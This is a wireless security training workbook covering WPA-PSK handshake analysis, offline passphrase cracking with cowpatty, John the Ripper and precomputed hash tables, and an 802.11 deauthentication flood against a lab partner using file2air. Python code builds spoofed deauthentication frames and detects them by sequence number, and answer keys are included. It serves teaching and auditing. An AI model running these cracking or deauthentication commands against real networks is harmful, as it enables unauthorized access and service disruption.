Using the supplied capture files on the lab CD, we can examine sample traffic from WPA/PSK networks. Start the Wireshark sniffer by clicking "K > Run Command..." to open the Run Command dialog box. Enter "wireshark" in the command text-box, then click the Run button. Open the capture file for this lab by clicking "File > Open", navigate to the /tmp/lab10 folder and select the "lab10capture1.dump" capture file.

Next, apply a display filter that will display only beacon frames.
(Hint: Select the frame type/subtype field of a beacon frame)
(Hint: The display filter should return 73 frames)
(Hint: The display field name is "wlan.fc.type_subtype")
(Hint: The type/subtype for beacon frames is "8")
(Hint: "wlan.fc.type_subtype == 8")

Next, select a beacon frame and expand the tagged management parameters tree.
Inspect the tagged management parameters, and answer the questions that follow.

Question: What is the SSID for this network?
Question: What is the encryption protocol used for unicast traffic on this network?
Question: What is the encryption protocol used for multicast traffic on this network?
Question: What is the authentication method used for this network?

By inspecting the information in beacon frames, we can identify the encryption mechanism in use for WPA networks, as well as the authentication mechanism. Now that we have determined that this network uses TKIP and a pre-shared key (PSK) for authentication, let's inspect the information in the four-way handshake.

10.1.2. Identifying the Four-Way Handshake

Using the "lab10capture1.dump" file, apply a filter to display only EAPOL traffic.
(Hint: Clear the existing display filter to display all packets)
(Hint: Look at the information displayed in the "Protocol" field for a display name)
(Hint: Look at frame number 43)
(Hint: The display filter should return four frames)
(Hint: "eapol")

After applying the display filter, select the first EAPOL frame and expand the "802.1x Authentication" protocol dissector tree, as shown below.

[Figure: Wireshark protocol dissector view of 802.1x authentication data]

The four frames displayed by Wireshark represent the four-way TKIP exchange. Inspecting the 802.1x authentication information in the first frame (frame number 43), we can see the reported nonce information.

Question: Is the first frame in the TKIP four-way handshake from the supplicant or the authenticator?
(Hint: Inspect the frame control flags)
(Hint: Is From DS or To DS set?)
(Hint: Compare the source address to the BSSID)

Since the source address matches the BSSID, we can determine that the first frame is from the AP, initiating the four-way handshake. Note that the MIC field in the first part of the four-way handshake is all 0's, since the AP does not have enough information to calculate the PTK that is required to identify the MIC key to calculate the MIC of this frame.

Next, select the second frame in the four-way handshake. This frame includes an additional nonce value that represents the supplicant nonce, since it is transmitted from the wireless station. Note that the MIC value is present in this frame, since the supplicant has enough information to calculate the PTK (authenticator address, supplicant address, authenticator nonce and now the supplicant nonce). Note that the "WPA Key" field in part two of the four-way handshake includes the capability information of the client system. In this case, the capability information matches what is advertised in the beacon frames (TKIP protocol, WPA-PSK for authentication). This information can be helpful in troubleshooting clients that are not successfully completing the four-way handshake due to incompatible cipher suites and authentication methods.

Next, select the third frame in the four-way handshake. Now that the AP has the supplicant nonce value, it can calculate the PTK and verify the MIC value transmitted from the supplicant in part two of the four-way handshake. Between frames two and three, the AP verifies the supplicant's PMK (and by extension, the PSK) by comparing the observed MIC in part two of the four-way handshake with the calculated MIC of the same frame. If the observed and calculated MICs match, the AP issues part three of the four-way handshake, effectively informing the client station that they have successfully authenticated.

Next, select frame four of the four-way handshake. This frame acknowledges the receipt and content of the third frame, but provides little in the way of authentication since both stations have already exchanged knowledge of the PTK.
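The four messages just walked through can be told apart automatically from the EAPOL-Key Key Information bits, and the supplicant's WPA IE carried in message 2 decodes to the same cipher and authentication answers as the beacon inspection in 10.1.1. The Python below is an added example written for this workbook, not SANS or cowpatty code; the four frames it checks are constructed here for a WPA/TKIP/PSK network (nonces and MIC values are made up), and it checks the all-zero MIC in message 1 that the text points out.

```python
"""Classify WPA/WPA2 four-way handshake messages from raw EAPOL-Key frames and read
the cipher suite and AKM the supplicant advertises in message 2.
Added example for this lab, not SANS or cowpatty code. Input is the EAPOL payload
(bytes after the 802.11/LLC headers); the sample handshake below is constructed for
a WPA/TKIP/PSK network with made-up nonces and MIC values.
"""
import struct

KI_PAIRWISE, KI_INSTALL, KI_ACK, KI_MIC = 0x0008, 0x0040, 0x0080, 0x0100   # Key Information bits
CIPHERS = {1: "WEP-40", 2: "TKIP", 4: "CCMP", 5: "WEP-104"}
AKMS = {1: "802.1X", 2: "PSK"}
WPA_OUI = b"\x00\x50\xf2"

def parse_eapol_key(frame):
    """Return the EAPOL-Key descriptor fields, or None if the frame is not EAPOL-Key."""
    if len(frame) < 99 or frame[1] != 3:              # 802.1X type 3 = EAPOL-Key, 95-byte descriptor
        return None
    body = frame[4:4 + struct.unpack("!H", frame[2:4])[0]]
    desc_type, key_info, key_len = struct.unpack("!BHH", body[:5])
    key_data_len = struct.unpack("!H", body[93:95])[0]
    return {"descriptor": desc_type, "key_info": key_info, "key_length": key_len,
            "replay": int.from_bytes(body[5:13], "big"), "nonce": body[13:45],
            "mic": body[77:93], "key_data": body[95:95 + key_data_len]}

def message_number(key):
    """1-4 for the pairwise handshake messages, 0 for anything else (e.g. group key)."""
    ki = key["key_info"]
    if not ki & KI_PAIRWISE:
        return 0
    ack, mic = bool(ki & KI_ACK), bool(ki & KI_MIC)
    if ack:
        return 3 if mic else 1
    if mic:
        return 2 if key["key_data"] else 4            # message 2 carries the supplicant's IE
    return 0

def parse_security_ie(key_data):
    """Decode the first WPA (vendor IE, OUI 00:50:f2 type 1) or RSN (ID 48) IE."""
    i = 0
    while i + 2 <= len(key_data):
        eid, elen = key_data[i], key_data[i + 1]
        body, i = key_data[i + 2:i + 2 + elen], i + 2 + elen
        if eid == 0xdd and body[:4] == WPA_OUI + b"\x01":
            kind, body = "WPA", body[4:]
        elif eid == 0x30:
            kind = "RSN"
        else:
            continue
        n_pair = struct.unpack("<H", body[6:8])[0]    # suite counts are little-endian
        off = 8 + 4 * n_pair
        n_akm = struct.unpack("<H", body[off:off + 2])[0]
        suite = lambda s: CIPHERS.get(s[3], "unknown(%d)" % s[3])   # OUI(3) + suite type(1)
        return {"ie": kind, "group": suite(body[2:6]),
                "pairwise": [suite(body[8 + 4 * k:12 + 4 * k]) for k in range(n_pair)],
                "akm": [AKMS.get(body[off + 5 + 4 * k], "unknown") for k in range(n_akm)]}
    return None

def audit_handshake(frames):
    """Classify each frame and collect what an auditor would note about the exchange."""
    report = {"sequence": [], "anonce": None, "snonce": None, "client_suite": None, "findings": []}
    for frame in frames:
        key = parse_eapol_key(frame)
        if key is None:
            continue
        n = message_number(key)
        report["sequence"].append(n)
        if n == 1:
            report["anonce"] = key["nonce"]
            if key["mic"] != bytes(16):               # AP has no PTK yet, so no MIC is possible
                report["findings"].append("message 1 carries a non-zero MIC")
        elif n == 2:
            report["snonce"] = key["nonce"]
            report["client_suite"] = parse_security_ie(key["key_data"])
    suite = report["client_suite"]
    if suite and "TKIP" in suite["pairwise"]:
        report["findings"].append("TKIP pairwise cipher in use (legacy cipher)")
    if suite and "PSK" in suite["akm"]:
        report["findings"].append("PSK authentication: passphrase strength alone resists offline guessing")
    return report

# --- constructed sample: WPA descriptor (254), TKIP, PSK ----------------------------------
def build_eapol_key(key_info, nonce=bytes(32), mic=bytes(16), key_data=b"", replay=1):
    body = (struct.pack("!BHH", 254, key_info, 32) + replay.to_bytes(8, "big") + nonce
            + bytes(16) + bytes(8) + bytes(8) + mic + struct.pack("!H", len(key_data)) + key_data)
    return struct.pack("!BBH", 1, 3, len(body)) + body

WPA_IE = bytes.fromhex("dd160050f20101000050f20201000050f20201000050f202")   # group TKIP, pairwise TKIP, AKM PSK
ANONCE, SNONCE, FAKE_MIC = bytes(range(1, 33)), bytes(range(101, 133)), b"\x11" * 16
SAMPLE_HANDSHAKE = [
    build_eapol_key(0x0089, nonce=ANONCE),                                          # M1: Ack
    build_eapol_key(0x0109, nonce=SNONCE, mic=FAKE_MIC, key_data=WPA_IE),           # M2: MIC + IE
    build_eapol_key(0x01c9, nonce=ANONCE, mic=FAKE_MIC, key_data=WPA_IE, replay=2), # M3: Ack+MIC+Install
    build_eapol_key(0x0109, mic=FAKE_MIC, replay=2),                                # M4: MIC, no key data
]
```

`audit_handshake(SAMPLE_HANDSHAKE)` returns the sequence [1, 2, 3, 4], the client suite {WPA, TKIP/TKIP, PSK} and two findings (TKIP and PSK); the same function run over a real capture's EAPOL frames is a quick way to confirm which cipher and authentication method a client actually negotiated.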
10.1.3. Auditing the PSK

Now that we have examined the details of the four-way handshake and the information that is exchanged, we can take a look at the process of auditing the PSK with a dictionary attack. In this fashion, an auditor can capture traffic from WPA-PSK networks and mount an offline dictionary attack to identify weak or poorly selected PSKs.

First, open two XTerm windows. In the first window, run the tool "top" to monitor the performance of your system. The output of top will look similar to the example provided below.

# top
top - 14:21:20 up 3:38, 1 user, load average: 0.00, 0.07, 0.06
Tasks: 27 total, 1 running, 26 sleeping, 0 stopped, 0 zombie
Cpu(s): 0.0% user, 0.0% system, 0.0% nice, 100.0% idle
Mem:  254608k total, 108684k used, 140924k free, 19016k buffers
Swap: 987988k total,      0k used, 987988k free, 65208k cached

  PID USER     PR  NI  VIRT  RES  SHR S %CPU %MEM   TIME+  COMMAND
    1 root      9   0   240  240  212 S  0.0  0.2   0:04.00 init
    2 root      8   0     0    0    0 S  0.0  0.0   0:00.00 keventd
    4 root     29   0     0    0    0 S  0.0  0.0   0:00.00 ksoftirqd
    5 root      9   0     0    0    0 S  0.0  0.0   0:00.00 bdflush
    6 root      9   0     0    0    0 S  0.0  0.0   0:00.00 kupdated
   11 root      9   0     0    0    0 S  0.0  0.0   0:00.00 kreiserfsd
   64 root      9   0   592  592  512 S  0.0  0.2   0:00.00 syslogd
   67 root      9   0   448  448  392 S  0.0  0.2   0:01.00 klogd
  174 root      9   0     0    0    0 S  0.0  0.0   0:00.00 khubd
  206 root      9   0   512  512  448 S  0.0  0.2   0:00.00 dhcpcd
 1682 root      9   0   520  520  464 S  0.0  0.2   0:00.00 inetd
 1685 root      9   0  1384 1384 1292 S  0.0  0.5   0:00.00 sshd
 1693 root      8   0   564  564  496 S  0.0  0.2   0:00.00 crond
 1696 root      9   0  2116 2108 1548 S  0.0  0.8   0:00.00 sendmail

In this example, we can see the processor for the system is reported as 100% idle. At the end of this exercise, press "Q" to exit top.

In the second XTerm window, change to the /tmp/lab10 directory as shown below.
# cd /tmp/lab10
# pwd
/tmp/lab10
# ls
lab10capture1.dump  lab10capture2.dump  lab10capture3.dump  words
#

Three packet captures from WPA-PSK networks have been supplied, along with a short list of dictionary words. Run the cowpatty tool from the current directory to see a list of available options, as shown below.

# cowpatty
cowpatty 4.0 - WPA-PSK dictionary attack.
cowpatty: Must supply a list of passphrases in a file with -f or a hash
file with -d. Use "-f -" to accept words on stdin.
Usage: cowpatty [options]
        -f      Dictionary file
        -d      Hash file (genpmk)
        -r      Packet capture file
        -s      Network SSID (enclose in quotes if SSID includes spaces)
        -h      Print this help information and exit
        -v      Print verbose information (more -v for more verbosity)
        -V      Print program version and exit

The cowpatty tool requires at least three command-line options: a list of dictionary words (or a genpmk hash file), a libpcap-formatted packet capture containing the WPA-PSK four-way handshake, and the network SSID. Note that all three of these parameters are required, and that the SSID must be specified in the proper case, exactly as it is seen on the network, because the SSID is the salt used to derive the PMK from the passphrase.

Using the "lab10capture1.dump" capture file, mount an attack against the PSK using the supplied dictionary file, as shown below. The SSID for this capture file is "SANS". While this command is running, examine the performance statistics reported by "top" in the other XTerm window.

# cowpatty -r lab10capture1.dump -f words -s SANS
cowpatty 4.0 - WPA-PSK dictionary attack.
Collected all necessary data to mount crack against passphrase.
Starting dictionary attack.  Please be patient.
key no. 1000: adynamia

Question: What was the result of assessing the PSK with the cowpatty tool?
Question: What is the PSK reported by cowpatty?
Question: How many passphrases were tested with cowpatty?
Question: How long did it take to recover the passphrase?
Question: How many words per second was your system able to test?
Question: What was the relative CPU utilization of your system when running cowpatty?
Question: What could be done to reduce the amount of time needed to test all the passwords in the supplied dictionary file using this tool?

Next, mount a similar attack against the "lab10capture2.dump" capture file. You'll need to determine the SSID for the network by examining the contents of a beacon frame with Wireshark. Note also that the passphrase used for this capture file is NOT present in the dictionary file. Use the hints below to identify the PSK used for this capture file.

(Hint: You can interactively try passwords one at a time with cowpatty by specifying a hyphen as the filename, as shown below. This causes cowpatty to accept passphrases from STDIN, i.e. keyboard input.)
(Hint: The company name is GNIP GNOP)
(Hint: The PSK is a derivation of the company name)
(Hint: The PSK is 8 characters in length)
(Hint: The PSK was selected using common techniques for selecting "strong" passwords)
(Hint: It is common for users to substitute a one ("1") for the letter "i" and a zero ("0") for the letter "o")

# cowpatty -r lab10capture2.dump -f - -s GNIPGNOPWLAN
cowpatty 4.0 - WPA-PSK dictionary attack.
Using STDIN for words.
Collected all necessary data to mount crack against passphrase.
Starting dictionary attack.  Please be patient.
gnip gnop
gnipgnop

The third capture file uses a PSK that is based on a modification of a dictionary word. Use John the Ripper in conjunction with cowpatty and the supplied word list to identify the password, as shown below. John's word-mangling rules generate the variations of each dictionary word and pipe them to cowpatty on STDIN. Note that this attack will take a long time; be prepared for a busy system over an extended period of time while mounting this attack (it may take several days to complete, depending on the speed of your processor).

# john -rules -wordlist:words -stdout | cowpatty -r lab10capture3.dump -f - -s GNIPGNOPWLAN

In more recent versions of coWPAtty, support for precomputed hash tables of PMKs was added.
Each hash table is specific to a single SSID, but it only has to be calculated once. The final capture file is a four-way handshake capture of a WPA2-PSK network using the very common SSID "linksys". Also supplied is the hash table "linksys.hash", which includes many popular passphrases and their precomputed PMK information. Instead of specifying the wordlist with the "-f" parameter, we reference a hash file that was generated with the "genpmk" tool included with coWPAtty. Recover the passphrase for the capture file "wpa2psk-linksys.dump", as shown below.

# cowpatty -r wpa2psk-linksys.dump -d linksys.hash -s linksys

Question: How much time did it take to recover the passphrase of the final capture with the precomputed PMK data?

This completes our tenth lab exercise. Congratulations.

Answers

Section 10.1.1
Question: What is the SSID for this network?
Answer: "SANS"
Question: What is the encryption protocol used for unicast traffic on this network?
Answer: TKIP
Question: What is the encryption protocol used for multicast traffic on this network?
Answer: TKIP
Question: What is the authentication method used for this network?
Answer: PSK, or pre-shared key.

Section 10.1.2
Question: Is the first frame in the TKIP four-way handshake from the supplicant or the authenticator?
Answer: The first frame is from the AP.

Section 10.1.3
Question: What was the result of assessing the PSK with the cowpatty tool?
Answer: The PSK was successfully recovered.
Question: What is the PSK reported by cowpatty?
Answer: "avocation"
Question: How many passphrases were tested with cowpatty?
Answer: 4459
Question: How long did it take to recover the passphrase?
Answer: 105 seconds on a Pentium Celeron 2 GHz system
Question: How many words per second was your system able to test?
Answer: 42.49 words/second
Question: What was the relative CPU utilization of your system when running cowpatty?
Answer: CPU utilization should be at nearly 100% for the duration of the attack.
Question: What could be done to reduce the amount of time needed to test all the passwords in the supplied dictionary file using this tool?
Answer: Distributing the wordlist to multiple systems or increasing the processing capacity of the system would reduce the time needed to test all the passwords. Precomputing the PMKs for the target SSID with genpmk also removes the expensive PBKDF2 step from the attack itself.

Lab 11 - Denial of Service Attacks

Complete the exercises in this lab to reinforce the material covered in the Denial of Service Attacks on Wireless Networks module. To complete these exercises, you will need the Backtrack Security Tools Linux CD and a supported wireless card, as included in the SWAT toolkit.

Lab 11-1: Demonstrating a Denial-of-Service Attack

Purpose: This lab will provide hands-on experience in demonstrating a denial-of-service attack against a wireless station.

Description: In this lab exercise you will use the file2air utility to implement an 802.11 deauthentication flood attack against a partner station that is connected to the SANS-ROGUE01 classroom network.

It is occasionally necessary to demonstrate the effectiveness of a denial-of-service attack, either in a consulting role or to demonstrate the effectiveness of such an attack to co-workers or management. This lab will provide the means necessary to implement such an attack. Please use this information wisely; do not launch denial-of-service attacks against networks that you are not authorized to attack.

In order to complete this lab, you will need to work with a partner system. One system will follow the steps marked "[VICTIM]" and will be the target of the denial-of-service attack. The second system will follow the steps marked "[ATTACKER]" to mount the DoS attack.
You may optionally wish to switch roles after completing this lab so each person has the opportunity to attack another system. If it is more convenient to work in a group of three for this lab exercise, read the information in the ADDITIONAL EXERCISE section to have a third participant capture the DoS attack exchange with a sniffer like Wireshark.

11.1.1. [VICTIM] Connect to the classroom network

We will use the "SANS-ROGUE01" network for the connectivity that will be attacked. The SANS-ROGUE01 network is open and does not require a WEP key for authentication. Execute the following commands from a shell prompt to connect to the SANS-ROGUE01 network:

# killall dhcpcd
# iwconfig wlan0 essid SANS-ROGUE01 enc off mode managed
# dhcpcd -d wlan0

At this point, your system should be connected to the SANS-ROGUE01 network. If you had trouble getting to this point, please contact a proctor or the instructor for assistance.

11.1.2. [VICTIM] Identify address information

Next, the victim will identify the client information that the attacker will use to target the attack. The information that is needed is the MAC address of the victim wireless card, the BSSID of the SANS-ROGUE01 access point, and the channel number. We can identify the MAC address of the wireless card by running the "ifconfig" utility, as shown below:

# ifconfig wlan0
wlan0     Link encap:Ethernet  HWaddr 00:02:6F:33:BE:41
          inet addr:172.16.0.101  Bcast:172.16.0.255  Mask:255.255.255.0
          UP BROADCAST NOTRAILERS RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:43830 errors:0 dropped:20 overruns:0 frame:0
          TX packets:1397 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:3802819 (3.6 Mb)  TX bytes:818024 (798.8 Kb)
          Interrupt:10 Memory:e8362000-e836f000

The string following "HWaddr" in this output is the MAC address of the wireless card. Write this address in the space provided below.
Next, use the "iwconfig" utility to identify the channel and BSSID information for the access point you are currently associated to, as shown below:

# iwconfig wlan0
wlan0     IEEE 802.11b  ESSID:"SANS-ROGUE01"
          Mode:Managed  Frequency:2.462GHz  Access Point: 00:0F:66:E3:76:3B
          Bit Rate:11Mb/s   Sensitivity=1/3
          Retry min limit:8   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality:23/70  Signal level:-70 dBm  Noise level:-94 dBm
          Rx invalid nwid:0  Rx invalid crypt:11  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:3663   Missed beacon:0

The string following "Access Point:" in this output is the BSSID of the access point. Write this address in the space provided below.

The string following "Frequency:" indicates the frequency that is in use. We can convert this value to the channel number by using the chart provided below. Identify the channel number in use by matching the frequency in the following chart:

Frequency (GHz)   Channel
2.412             1
2.417             2
2.422             3
2.427             4
2.432             5
2.437             6
2.442             7
2.447             8
2.452             9
2.457             10
2.462             11
2.467             12
2.472             13
2.484             14

Use the following text box to document the MAC address, BSSID and channel number for the victim station:

Victim MAC address: ______________________
AP BSSID:           ______________________
Channel:            ______________________

11.1.3. [VICTIM] Ping a remote system

In order to quickly identify when the victim station has lost network connectivity, initiate a continuous ping to a remote system, as shown below:

# ping -i 5 172.16.0.1

This command will ping the remote host at 172.16.0.1 every five seconds until it is interrupted by pressing CTRL/C. Leave the ping command running until the end of this exercise.

11.1.4. [ATTACKER] Examine deauthenticate file contents

In order to mount a deauthenticate attack, we need to transmit multiple deauthenticate frames onto the network. We will use the file2air tool for this task, so we need a file that represents the packet we will transmit into the network repeatedly. Change to the /tmp/lab11 directory and examine the contents of the file "deauth.bin".
Since this is a binary file, we cannot view it with a simple ASCII editor. We can dump the hexadecimal contents of the file with the xxd utility, however, as shown below.

# cd /tmp/lab11
# xxd deauth.bin
0000000: c000 0000 ...
# ls -l deauth.bin
-rw-r--r--  1 root root 28 Apr 21 13:12 deauth.bin
#

The deauth.bin file is small, only 28 bytes. The 28 bytes of this file represent a standard 802.11 management frame header (24 bytes) with a 4-byte payload. The leading 0xc0 byte is the frame control field, indicating that this packet is a management frame (type 0) of sub-type deauthenticate (sub-type 12). The default MAC addresses in this packet will be overridden with command-line arguments to the file2air tool.

11.1.5. [ATTACKER] Introduction to file2air

Next, run the file2air command with no command-line parameters to identify a list of available options, as shown below:

# file2air
file2air v1.0RC1 - inject 802.11 packets from binary files
file2air: Must specify -i and -f
Usage: file2air [options]
        -i  --interface   Specify an interface name
        -r  --driver      Driver type for injection
        -f  --filename    Specify a binary file contents for injection
        -c  --channel     Channel number
        -n  --count       Number of packets to send
        -w  --delay       Delay between packets (uX for usec or X for seconds)
        -t  --fast        Alias for -w u10000 (10 packets per second)
        -d  --dest        Override the destination address
        -s  --source      Override the source address
        -b  --bssid       Override the BSSID address
        -q  --seqnum      Override the sequence number (leading 0x for hex value)
        -p  --pieces      Fragment the payload into X pieces
        -h  --help        Output this help information and exit
        -v  --verbose     Print verbose info (more -v's for more verbosity)
#

The critical command-line options we are going to use for the DoS attack are detailed as follows:

Option  Argument (if any)  Description
-i      wlan0              Interface name to use for transmitting packets
-r      wlan-ng            Driver name used for the wlan0 interface
-f      deauth.bin         Binary file describing the packet to inject
-c      <channel>          The channel number of the victim; refer to the chart above for the correct channel number
-n      100000             Number of packets to transmit before stopping
-t      (none)             Inject 10 packets per second, no argument necessary
-d      <victim MAC>       Destination address to send the packet to; the victim MAC address from the chart above
-s      <AP BSSID>         Source address to spoof; must be the MAC address of the AP, i.e. the AP BSSID from the chart above
-b      <AP BSSID>         BSSID address to spoof; the AP BSSID from the chart above

Substitute the arguments in angle brackets with the information collected from the victim station. Implementing the deauthenticate flood attack is very straightforward. Simply run the file2air command with the appropriate arguments, as shown below:

*** NOTE: Double-check the channel number and MAC addresses before initiating the DoS attack. DO NOT mount a DoS attack against any stations other than your lab partner. ***

# file2air -i wlan0 -r wlan-ng -f deauth.bin -c <channel> -n 100000 -t -d <victim MAC> -s <AP BSSID> -b <AP BSSID>
file2air v1.0RC1 - inject 802.11 packets from binary files
Transmitting packets ...

This command will continue to execute for several minutes. Allow this command to continue running while we return to examine the victim station.

11.1.6. [VICTIM] Examine victim connectivity results

Return to the victim station and examine the output from the ping command. The ping responses will stop incrementing while the attack is underway.
After a minute or two, the ping command will present a "Destination Host Unreachable" error. Note that it is possible for the victim station to occasionally transmit a ping packet and get a response while under attack. This could be because the packets being transmitted by the attacker are colliding with other traffic on the network and need to be retransmitted, or because the attacker is limiting the attack to 10 deauthenticate frames per second, which leaves short windows in which the victim can reconnect.

Examine the last several lines of output from the kernel logger by running the dmesg command, as shown below:

# dmesg | tail -24
wifi0: TXEXC - status=0x0004 ([Discon]) tx_control=000c
  retry_count=0 tx_rate=0 fc=0x0108 (Data?:0 ToDS)
  A1=00:0f:66:e3:76:3b A2=00:02:6f:33:be:41 A3=ff:ff:ff:ff:ff:ff
wifi0: LinkStatus=1 (Connected)
wifi0: LinkStatus: BSSID=00:0f:66:e3:76:3b
wifi0: LinkStatus=2 (Disconnected)
wifi0: LinkStatus: BSSID=00:0f:66:e3:76:3b
wifi0: TXEXC - status=0x0004 ([Discon]) tx_control=000c
  retry_count=0 tx_rate=0 fc=0x0108 (Data?:0 ToDS)
  A1=00:0f:66:e3:76:3b A2=00:02:6f:33:be:41 A3=ff:ff:ff:ff:ff:ff
wifi0: LinkStatus=1 (Connected)
wifi0: LinkStatus: BSSID=00:0f:66:e3:76:3b
wifi0: LinkStatus=2 (Disconnected)
wifi0: LinkStatus: BSSID=00:0f:66:e3:76:3b
wifi0: LinkStatus=1 (Connected)
wifi0: LinkStatus: BSSID=00:0f:66:e3:76:3b
wifi0: LinkStatus=2 (Disconnected)
wifi0: LinkStatus: BSSID=00:0f:66:e3:76:3b

From this output, we can see that the Linux driver is reporting repeated connect and disconnect events, reconnecting each time between the deauthenticate frames it receives from the attacker, and that data frames queued for transmission (the TXEXC lines) fail with a [Discon] status while the station is disconnected.
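The deauth.bin layout from 11.1.4, the frame control flags inspected in Lab 10, and the sequence-number analysis used in this lab's answers to tell a forged deauthenticate frame from a genuine one can all be exercised in a few lines. The following added example (not code from file2air or from the lab; the AP and victim addresses are the ones in the dmesg output above, the sequence numbers are constructed) builds a deauthentication frame with the AP's address spoofed as source and BSSID, parses it back, and runs a per-transmitter sequence-number monitor of the kind a WLAN IDS uses. The body emitted here is the 2-byte reason code that 802.11 defines; the lab's deauth.bin carries a 4-byte payload, and file2air transmits whatever the file contains:

```python
import struct

# Little-endian frame control 0x00c0: protocol 0, type 0 (management), subtype 12
# (deauthentication), no flags. This is the leading c0 00 seen in deauth.bin.
FC_DEAUTH, FC_BEACON = 0x00c0, 0x0080
REASON_CLASS3_FROM_NONASSOC = 7      # "Class 3 frame received from nonassociated station"


def build_deauth(dst, src, bssid, seq, reason=REASON_CLASS3_FROM_NONASSOC):
    """24-byte management header followed by the 2-byte reason code."""
    seq_ctl = (seq & 0x0fff) << 4    # 12-bit sequence number, fragment 0 in the low nibble
    header = struct.pack("<HH6s6s6sH", FC_DEAUTH, 0x013a, dst, src, bssid, seq_ctl)
    return header + struct.pack("<H", reason)


def build_beacon_header(src, seq):
    """Header-only beacon (subtype 8) from an AP; enough for sequence tracking."""
    return struct.pack("<HH6s6s6sH", FC_BEACON, 0, b"\xff" * 6, src, src, (seq & 0x0fff) << 4)


def parse_mgmt(frame):
    """Decode the fields the lab inspects: type/subtype, DS flags, addresses, sequence."""
    fc, _duration, a1, a2, a3, seq_ctl = struct.unpack_from("<HH6s6s6sH", frame, 0)
    info = {"type": (fc >> 2) & 0x3, "subtype": (fc >> 4) & 0xf,
            "to_ds": bool(fc & 0x0100), "from_ds": bool(fc & 0x0200),
            "da": a1, "sa": a2, "bssid": a3,
            "seq": seq_ctl >> 4, "frag": seq_ctl & 0xf, "body": frame[24:]}
    if info["type"] == 0 and info["subtype"] == 12 and len(info["body"]) >= 2:
        info["reason"], = struct.unpack_from("<H", info["body"], 0)
    return info


class SeqMonitor:
    """Per-transmitter sequence tracking, the check a WLAN IDS uses to tell an
    AP's own deauthentication from one forged with the AP's address: the
    attacker's card keeps its own counter, so its frames do not continue the
    AP's. An anomalous frame does not advance the tracked counter."""

    def __init__(self, window=32):
        self.window = window
        self.last = {}

    def observe(self, info):
        """Return True if the frame's sequence number breaks the sender's run."""
        sa, seq = info["sa"], info["seq"]
        prev = self.last.get(sa)
        if prev is None:
            self.last[sa] = seq
            return False
        gap = (seq - prev) % 4096        # the counter wraps at 4096
        if gap == 0 or gap > self.window:  # replayed, or far from the expected next value
            return True
        self.last[sa] = seq
        return False


# AP and victim addresses as they appear in the lab's dmesg output; the
# sequence numbers used below are constructed.
AP = bytes.fromhex("000f66e3763b")
VICTIM = bytes.fromhex("00026f33be41")


def demo():
    """Interleave genuine beacons (counter 100..105) with forged deauths that
    spoof the AP, plus one deauth the AP itself sends; return flagged indexes."""
    frames = [build_beacon_header(AP, s) for s in range(100, 104)]
    frames.append(build_deauth(VICTIM, AP, AP, 2300))      # attacker, own counter
    frames += [build_beacon_header(AP, s) for s in range(104, 106)]
    frames.append(build_deauth(VICTIM, AP, AP, 2301))      # attacker again
    frames.append(build_deauth(VICTIM, AP, AP, 106))       # genuine AP deauth
    monitor = SeqMonitor()
    return [i for i, f in enumerate(frames) if monitor.observe(parse_mgmt(f))]


if __name__ == "__main__":
    print(build_deauth(VICTIM, AP, AP, 1).hex())
    print(demo())                                          # [4, 7]
```

The monitor deliberately keeps the last legitimate counter value when it flags a frame, so a flood of forged frames does not drag the tracked value along with it; the price is that a genuine jump (an AP reboot, or an attacker who uses file2air's sequence-number override to guess the AP's counter) needs a re-sync rule that this short version does not include.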
11.1.7. [ATTACKER] Stop the DoS attack

Return to the attacker's session and stop the DoS attack by pressing CTRL/C. This will cause file2air to stop gracefully, returning to the shell prompt.

11.1.8. [VICTIM] Monitor connectivity

After the attacker stops the DoS attack, the victim station should return to normal connectivity.

Question: The victim station returns to normal operating mode when the attack is terminated. What kind of a DoS attack does this represent?

11.1.9. [VICTIM] Cleanup

Stop the ping command by pressing CTRL/C.

ADDITIONAL EXERCISE

If there is a third station available, consider using a tool like Wireshark to capture the DoS attack while it is underway. Examine the trace after completing the deauthenticate flood by applying a filter on the victim address:

wlan.da eq 00:01:02:03:04:05 or wlan.sa eq 00:01:02:03:04:05

where 00:01:02:03:04:05 is the MAC address of the victim station.

What does the client system attempt to do when it receives a deauthenticate frame?

Is there a way we can determine if the deauthenticate frame was transmitted by an access point or by an attacker?

This completes our 11th lab exercise. Congratulations.

Answers

Section 11.1.8
Question: The victim station returns to normal operating mode when the attack is terminated. What kind of a DoS attack does this represent?
Answer: A deauthenticate flood is an example of a non-persistent DoS attack: the effect lasts only as long as the attacker keeps transmitting.

Section ADDITIONAL EXERCISE
Question: What does the client system attempt to do when it receives a deauthenticate frame?
Answer: The victim station will attempt to reauthenticate to the network by issuing a probe request, then authentication and association requests. Depending on when the next deauthenticate frame is received during the process of reconnecting to the network, the station will have to restart the probe request, authentication and association process in order to regain connectivity to the network.
Question: Is there a way we can determine if the deauthenticate frame was transmitted by an access point or by an attacker?
Answer: Examine the sequence number used by the attacker. The sequence number is controlled by firmware for the Prism2 cards supplied in the SWAT kit, and will likely be significantly smaller or larger than the sequence numbers used by the access point. Even though the access point frames and the deauthenticate frames have the same source MAC address and BSSID, a WLAN IDS can use sequence number analysis to identify anomalies in the pattern and flag the traffic as originating from a spoofed source.

Lab Appendix A

This appendix provides a simple set of instructions to use a USB thumb drive for persistent storage when using the Auditor Security Toolkit Linux distribution.

Purpose: Configure Auditor to save files to persistent storage.

Description: Because the Auditor Security Toolkit Linux distribution is CD-ROM based, when the system is powered off, all files that were created are lost. Follow these instructions to save files to a USB thumb drive.

A.1.1. Open an XTerm Window

Open a terminal window by clicking on the XTerm icon (the small black box to the left of the square with the number 1 in it).

A.1.2. Make a Mount Point

Create a directory in the /mnt directory that will be used as a mount point for the USB drive, as shown below.

root@1[root]# mkdir /mnt/thumb
root@1[root]#

A.1.3. Insert the USB Thumb Drive

Insert the thumb drive into an available USB port.

A.1.4. Identify the USB Device

Identify the USB device name used for the thumb drive on your system. For most users, this will be the "/dev/sda1" device. We can get a list of available hard drive partitions and devices by running the "fdisk -l" command, as shown below.
root@1[root]# fdisk -l

Disk /dev/sda: 65 MB, 65208320 bytes
128 heads, 11 sectors/track, 89 cylinders
Units = cylinders of 1408 * 512 = 720896 bytes

   Device Boot    Start       End    Blocks   Id  System
/dev/sda1   *         1        90     63674    6  FAT16
Partition 1 has different physical/logical endings:
     phys=(88, 128, 11) logical=(89, 97, 1)
root@1[root]#

We can see from this output that the USB device is /dev/sda1. This will be the appropriate device name for almost all users.

A.1.5. Mount the USB Drive

